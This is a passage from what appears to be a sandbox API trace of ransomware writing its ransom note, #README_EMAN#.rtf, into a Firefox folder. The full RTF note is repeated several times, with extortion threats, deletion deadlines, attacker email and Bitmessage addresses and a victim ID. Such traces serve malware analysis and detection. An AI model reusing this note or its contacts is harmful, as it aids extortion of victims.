\\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0220.380] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0220.380] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x38dfac8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\\\x1e4=a\x99ª\x8d\\Ë\x04`\x1b\x1ehG(\"…ê\x19Ö0\x03ã\x08", lpUsedDefaultChar=0x0) returned 8717 [0220.380] WriteFile (in: hFile=0x2d0, lpBuffer=0x38dfac8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x38dfac8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0220.380] CloseHandle (hObject=0x2d0) returned 1 [0220.380] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\extensions\\#README_EMAN#.rtf" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\extensions\\#readme_eman#.rtf")) returned 0xffffffff [0220.380] GetLastError () returned 0x2 [0220.380] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\extensions\\#README_EMAN#.rtf" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\extensions\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0220.382] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 